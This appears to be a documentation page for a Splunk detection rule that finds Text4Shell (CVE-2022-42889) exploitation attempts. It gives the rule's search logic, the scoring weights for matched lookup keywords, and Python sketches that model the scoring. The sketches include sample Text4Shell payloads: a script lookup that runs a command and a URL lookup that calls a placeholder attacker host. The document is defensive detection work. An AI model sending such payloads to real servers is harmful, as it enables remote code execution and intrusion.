Exploit Public Facing Application via Apache Commons Text

Status: production
Severity: low
Group by: Web.src, Web.status, c-uri-query, c-uri-stem, c-useragent, cs-host, cs-method
Author: Michael Haag, Splunk
Source: github.com/splunk/security_content

The following analytic detects attempts to exploit the CVE-2022-42889 vulnerability in the Apache Commons Text Library, known as Text4Shell. It leverages the Web datamodel to identify suspicious HTTP requests containing specific lookup keys (url, dns, script) that can lead to Remote Code Execution (RCE). This activity is significant as it targets a critical vulnerability that can allow attackers to execute arbitrary code on the server. If confirmed malicious, this could lead to full system compromise, data exfiltration, or further lateral movement within the network.

MITRE ATT&CK coverage

Tactic	Techniques
Initial Access	`T1133` External Remote Services, `T1190` Exploit Public-Facing Application
Persistence	`T1133` External Remote Services, `T1505.003` Server Software Component: Web Shell

Rule body splunk

name: Exploit Public Facing Application via Apache Commons Text
id: 19a481e0-c97c-4d14-b1db-75a708eb592e
version: 11
creation_date: '2022-10-26'
modification_date: '2026-05-13'
author: Michael Haag, Splunk
status: production
type: Anomaly
description: The following analytic detects attempts to exploit the CVE-2022-42889 vulnerability in the Apache Commons Text Library, known as Text4Shell. It leverages the Web datamodel to identify suspicious HTTP requests containing specific lookup keys (url, dns, script) that can lead to Remote Code Execution (RCE). This activity is significant as it targets a critical vulnerability that can allow attackers to execute arbitrary code on the server. If confirmed malicious, this could lead to full system compromise, data exfiltration, or further lateral movement within the network.
data_source:
    - Nginx Access
search: |-
    | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Web
      WHERE Web.http_method IN (POST, GET)
      BY Web.src Web.status Web.uri_path
         Web.dest Web.http_method Web.uri_query
         Web.http_user_agent
    | `drop_dm_object_name("Web")`
    | eval utf=if(like(lower(uri_query),"%:utf-8:http%"),2,0)
    | eval lookup = if(like(lower(uri_query), "%url%") OR like(lower(uri_query), "%dns%") OR like(lower(uri_query), "%script%"),2,0)
    | eval other_lookups = if(like(lower(uri_query), "%env%") OR like(lower(uri_query), "%file%") OR like(lower(uri_query), "%getRuntime%") OR like(lower(uri_query), "%java%") OR like(lower(uri_query), "%localhost%") OR like(lower(uri_query), "%properties%") OR like(lower(uri_query), "%resource%") OR like(lower(uri_query), "%sys%") OR like(lower(uri_query), "%xml%") OR like(lower(uri_query), "%base%"),1,0)
    | addtotals fieldname=Score utf lookup other_lookups
    | fields Score, src, dest, status, uri_query, uri_path, http_method, http_user_agent firstTime lastTime
    | `security_content_ctime(firstTime)`
    | `security_content_ctime(lastTime)`
    | where Score >= 3
    | `exploit_public_facing_application_via_apache_commons_text_filter`
how_to_implement: To implement, one must be collecting network traffic that is normalized in CIM and able to be queried via the Web datamodel. Or, take the chunks out needed and tie to a specific network source type to hunt in. Tune as needed, or remove the other_lookups statement.
known_false_positives: False positives are present when the values are set to 1 for utf and lookup. It's possible to raise this to TTP (direct finding) if removal of other_lookups occur and Score is raised to 2 (down from 4).
references:
    - https://sysdig.com/blog/cve-2022-42889-text4shell/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-42889
    - https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om
    - https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
    - https://github.com/kljunowsky/CVE-2022-42889-text4shell
    - https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035
drilldown_searches:
    - name: View the detection results for - "$dest$"
      search: '%original_detection_search% | search  dest = "$dest$"'
      earliest_offset: $info_min_time$
      latest_offset: $info_max_time$
    - name: View risk events for the last 7 days for - "$dest$"
      search: '| from datamodel Risk.All_Risk | search normalized_risk_object IN ("$dest$") | stats count min(_time) as firstTime max(_time) as lastTime values(search_name) as "Search Name" values(risk_message) as "Risk Message" values(analyticstories) as "Analytic Stories" values(annotations._all) as "Annotations" values(annotations.mitre_attack.mitre_tactic) as "ATT&CK Tactics" by normalized_risk_object | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`'
      earliest_offset: 7d
      latest_offset: "0"
intermediate_findings:
    entities:
        - field: dest
          type: system
          score: 20
          message: A URL was requested related to Text4Shell on $dest$ by $src$.
threat_objects:
    - field: src
      type: ip_address
analytic_story:
    - Text4Shell CVE-2022-42889
asset_type: Web Server
cve:
    - CVE-2022-42889
mitre_attack_id:
    - T1133
    - T1190
    - T1505.003
product:
    - Splunk Enterprise
    - Splunk Enterprise Security
    - Splunk Cloud
category: web
security_domain: network
tests:
    - name: True Positive Test
      attack_data:
        - data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1190/text4shell/text4shell_nginx.log
          source: nginx:plus:kv
          sourcetype: nginx:plus:kv
      test_type: unit

Stages and Predicates

Stage 1: `tstats`

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Web
  WHERE Web.http_method IN (POST, GET)
  BY Web.src Web.status Web.uri_path
     Web.dest Web.http_method Web.uri_query
     Web.http_user_agent

Stage 2: `search`

| `drop_dm_object_name("Web")`

Stage 3: `eval`

| eval utf=if(like(lower(uri_query),"%:utf-8:http%"),2,0)

utf =
  if like(lower(uri_query), "%:utf-8:http%") then 2
  else 0

Stage 4: `eval`

| eval lookup = if(like(lower(uri_query), "%url%") OR like(lower(uri_query), "%dns%") OR like(lower(uri_query), "%script%"),2,0)

lookup =
  if like(lower(uri_query), "%url%") OR like(lower(uri_query), "%dns%") OR like(lower(uri_query), "%script%") then 2
  else 0

Stage 5: `eval`

| eval other_lookups = if(like(lower(uri_query), "%env%") OR like(lower(uri_query), "%file%") OR like(lower(uri_query), "%getRuntime%") OR like(lower(uri_query), "%java%") OR like(lower(uri_query), "%localhost%") OR like(lower(uri_query), "%properties%") OR like(lower(uri_query), "%resource%") OR like(lower(uri_query), "%sys%") OR like(lower(uri_query), "%xml%") OR like(lower(uri_query), "%base%"),1,0)

other_lookups =
  if like(lower(uri_query), "%env%") OR like(lower(uri_query), "%file%") OR like(lower(uri_query), "%getRuntime%") OR like(lower(uri_query), "%java%") OR like(lower(uri_query), "%localhost%") OR like(lower(uri_query), "%properties%") OR like(lower(uri_query), "%resource%") OR like(lower(uri_query), "%sys%") OR like(lower(uri_query), "%xml%") OR like(lower(uri_query), "%base%") then 1
  else 0

Stage 6: `addtotals`

| addtotals fieldname=Score utf lookup other_lookups
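
Stages 3 through 6 amount to a weighted substring score over the lowercased query string. The Python sketch below models that arithmetic outside Splunk so the weights are easier to follow. It is an illustration, not part of the rule: `score_query` and the sample query strings are hypothetical, and it assumes `like()` with a `%...%` pattern behaves as a case-sensitive substring test. Under that assumption the mixed-case `%getRuntime%` pattern cannot match a lowercased query, and the sketch reproduces that behaviour as written.

```python
# Illustrative model of stages 3-6 (utf, lookup, other_lookups, Score).
# This is not Splunk code; names and sample inputs are hypothetical.

UTF_PATTERN = ":utf-8:http"
LOOKUP_KEYS = ("url", "dns", "script")
# Patterns copied as written in the rule, including the mixed-case "getRuntime".
OTHER_KEYS = ("env", "file", "getRuntime", "java", "localhost",
              "properties", "resource", "sys", "xml", "base")


def score_query(uri_query: str) -> dict:
    """Return the three signal values and their sum for one query string."""
    q = uri_query.lower()  # mirrors lower(uri_query)
    utf = 2 if UTF_PATTERN in q else 0
    lookup = 2 if any(key in q for key in LOOKUP_KEYS) else 0
    # Case-sensitive test: "getRuntime" never matches the lowercased string,
    # but payloads that contain it usually also contain "java".
    other_lookups = 1 if any(key in q for key in OTHER_KEYS) else 0
    return {
        "utf": utf,
        "lookup": lookup,
        "other_lookups": other_lookups,
        "Score": utf + lookup + other_lookups,
    }


if __name__ == "__main__":
    samples = [
        "search=${script:javascript:java.lang.Runtime.getRuntime().exec('id')}",
        "x=${url:UTF-8:http://attacker.example/a}",
        "q=shoes&page=2",
    ]
    for sample in samples:
        print(score_query(sample)["Score"], sample)
```

Because the match runs on the raw `uri_query` value, a payload whose colons are percent-encoded (for example `%3AUTF-8%3Ahttp`) would not trigger the `utf` signal in this model, although the lookup keys themselves would still match.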

Stage 7: `fields`

| fields Score, src, dest, status, uri_query, uri_path, http_method, http_user_agent firstTime lastTime

Stage 8: `search`

| `security_content_ctime(firstTime)`

Stage 9: `search`

| `security_content_ctime(lastTime)`

Stage 10: `where`

| where Score >= 3
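
With weights of 2 (`utf`), 2 (`lookup`), and 1 (`other_lookups`), a threshold of 3 means that no single signal can fire the rule on its own. The sketch below enumerates the signal combinations to make that explicit. The weights and threshold are taken from the search; the helper name `passing_combinations` is hypothetical.

```python
from itertools import product

# Weights and threshold as they appear in the search.
WEIGHTS = {"utf": 2, "lookup": 2, "other_lookups": 1}
THRESHOLD = 3


def passing_combinations():
    """List every set of fired signals whose summed weight meets the threshold."""
    names = list(WEIGHTS)
    passing = []
    for flags in product((False, True), repeat=len(names)):
        fired = tuple(name for name, on in zip(names, flags) if on)
        total = sum(WEIGHTS[name] for name in fired)
        if total >= THRESHOLD:
            passing.append((fired, total))
    return passing


if __name__ == "__main__":
    for fired, total in passing_combinations():
        print(total, " + ".join(fired))
```

Four of the eight combinations pass: any two signals together, or all three. Raising the threshold to 4 in this model would require both `utf` and `lookup` to match, and dropping `other_lookups` would leave the same two-signal requirement.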

Stage 11: `search`

| `exploit_public_facing_application_via_apache_commons_text_filter`

Indicators

Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators. Blank or 1 shows that the indicator is specific to this rule.

Field	Kind	Values
`Score`	ge	`3`
`Web.http_method`	in	`"GET"` `"POST"`
